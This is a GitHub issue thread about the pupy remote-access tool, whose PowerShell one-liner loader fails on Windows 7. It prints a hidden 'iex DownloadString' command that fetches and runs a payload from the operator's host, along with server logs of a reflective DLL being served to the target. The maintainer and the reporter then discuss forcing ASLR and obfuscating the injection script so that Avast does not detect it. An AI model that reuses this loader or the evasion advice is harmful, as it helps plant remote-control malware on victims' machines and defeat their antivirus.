### ISSUE TITLE
Powershell one-liner failed

### ISSUE THREAD

**Issue by quentinhardy** [n1nj4sec/pupy#109]
Hello,

I have tried the new module **Powershell one-liner** but it has **failed**.
I have tried with a x64 powershell and x86 without administrator rights. I'm on Wind7 SP1.

I have used the following command on my controller:
```
root@kali:/pupy/pupy# python pupygen.py -f ps1_oneliner connect
[!] required argument missing, automatically adding parameter --host 192.168.1.20:443 from local ip address
[+] copy/paste this one-line loader to deploy pupy without writing on the disk :
 --- 
powershell.exe -w hidden -c "iex(New-Object System.Net.WebClient).DownloadString('http://192.168.1.20:8080/p')"
 --- 
[+] Started http server on 0.0.0.0:8080 
[+] waiting for a connection ...
192.168.1.21 - - [20/Jun/2016] "GET /p HTTP/1.1" 200 -
[+]  powershell script stage1 served !
192.168.1.21 - - [20/Jun/2016] "GET /rpi HTTP/1.1" 200 -
[+]  powershell Invoke-ReflectivePEInjection.ps1 script served !
192.168.1.21 - - [20/Jun/2016] "GET /b32 HTTP/1.1" 200 -
[+]  generating x86 reflective dll ...
embedding /opt/pupy/pupy/network/transports/ssl ...
[+]  pupy x86 reflective dll served !
```

Here is the command executed on the target:
```
PS C:\Users\b> powershell.exe -c "iex(New-Object System.Net.WebClient).DownloadString('http://192.168.1.20:8080/p')"
AVERTISSEMENT : PE is not compatible with DEP, might cause issues
AVERTISSEMENT : PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting
PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)
Invoke-Command : VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in
 a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants
might be free).
Au niveau de ligne : 2892 Caractère : 17
+         Invoke-Command <<<<  -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $Pro
cName,$ForceASLR)
    + CategoryInfo          : OperationStopped: (VirtualAlloc fa...might be free).:String) [Invoke-Command], RuntimeEx
   ception
    + FullyQualifiedErrorId : VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running
    the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the ad
  dress the PE wants might be free).,Microsoft.PowerShell.Commands.InvokeCommandCommand
```

Notice I have tried on another computer (Wind7 SP1) where Avast antivirus is installed and **it is detected**.

**Comment by n1nj4sec** [comment]
Can you try to edit pupylib/payload/ps1_oneliner.py and add the parameter -ForceASLR like the powershell script advise you to ?
like this line 23
```
Invoke-ReflectivePEInjection -PEBytes $b -ForceASLR
```
For the av it's probably a matter of encoding/decoding the Invoke-ReflectivePEInjection.ps1 script and if it's not I'm positively surprised of avast :-)

**Comment by n1nj4sec** [comment]
I also noticed that the powershell process was huge and took up to 250Mo on my test machine but I'm not very comfortable with powershell syntax and I didn't had time to investigate why it allocates so much memory, so perhaps you don't have enough ram left ?

**Comment by quentinhardy** [comment]
Avast detects the powershell script Invoke-ReflectivePEInjection.ps1 **when the source code is downloaded** on the target over http.

This source code is not stored on the target but Avast does network "inspection", over http at least.

When the target executes _iex (New-Object System.Net.WebClient).DownloadString("http://%s:%s/rpi")_ (see _ps1_oneliner.py_ file), the Invoke-ReflectivePEInjection.ps1 source code is detected by Avast. 

Probably **some strings are detected** in this script. If the source code is encoded or encrypted before loading in memory, I think it will avoid detection by Antivirus.

**Comment by n1nj4sec** [comment]
I didn't test it with avast but I added some simple obfuscation to the powershell script
